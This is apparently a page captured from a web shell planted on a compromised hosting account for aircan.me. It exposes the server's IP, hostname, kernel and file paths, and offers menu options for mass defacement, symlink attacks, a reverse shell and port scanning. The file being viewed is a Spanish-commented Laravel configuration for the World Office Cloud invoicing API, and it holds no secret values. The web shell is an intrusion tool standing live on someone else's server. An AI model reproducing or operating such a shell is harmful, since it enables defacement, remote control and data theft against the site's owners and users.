Tul xxx Tul
User / IP
:
216.73.216.146
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
ventas
/
config
/
Viewing: worldoffice.php
<?php return [ /* |-------------------------------------------------------------------------- | World Office Cloud API Configuration |-------------------------------------------------------------------------- | | Configuración para la integración con World Office | Documentación: https://devapidoc.worldoffice.cloud/ | | Para obtener el token: | 1. Ingresa a World Office Cloud | 2. Menú hamburguesa > Configuración > Configuración General | 3. Sección API > Copiar token | */ 'base_url' => env('WORLDOFFICE_BASE_URL', 'https://devapidoc.worldoffice.cloud'), // Email registrado en World Office (para obtener token automáticamente) 'email' => env('WORLDOFFICE_EMAIL'), // Token JWT (se puede obtener manualmente desde la app o automáticamente con el email) // Vigencia: 12 horas 'token' => env('WORLDOFFICE_TOKEN'), 'timeout' => env('WORLDOFFICE_TIMEOUT', 30), 'retry_attempts' => env('WORLDOFFICE_RETRY_ATTEMPTS', 3), /* |-------------------------------------------------------------------------- | Configuración de Prefijos de Documentos |-------------------------------------------------------------------------- */ 'prefijo_factura' => env('WORLDOFFICE_PREFIJO_FACTURA', 'FE'), 'prefijo_nota_credito' => env('WORLDOFFICE_PREFIJO_NC', 'NC'), 'prefijo_nota_debito' => env('WORLDOFFICE_PREFIJO_ND', 'ND'), /* |-------------------------------------------------------------------------- | Configuración de Monedas |-------------------------------------------------------------------------- */ 'currencies' => [ 'default' => env('WORLDOFFICE_DEFAULT_CURRENCY', 'COP'), 'supported' => ['COP', 'USD', 'EUR'], ], /* |-------------------------------------------------------------------------- | Configuración de Impuestos |-------------------------------------------------------------------------- */ 'tax_rates' => [ 'iva_19' => 'IVA_19', 'iva_5' => 'IVA_5', 'iva_0' => 'IVA_0', 'excluido' => 'EXCLUIDO', ], /* |-------------------------------------------------------------------------- | Configuración de Formas de Pago |-------------------------------------------------------------------------- */ 'formas_pago' => [ 'efectivo' => 'EFECTIVO', 'tarjeta' => 'TARJETA', 'transferencia' => 'TRANSFERENCIA', 'credito' => 'CREDITO', ], /* |-------------------------------------------------------------------------- | Configuración de Facturación Electrónica |-------------------------------------------------------------------------- */ 'enviar_email' => env('WORLDOFFICE_ENVIAR_EMAIL', true), 'generar_pdf' => env('WORLDOFFICE_GENERAR_PDF', true), ];
Coded With 💗 by
0x6ick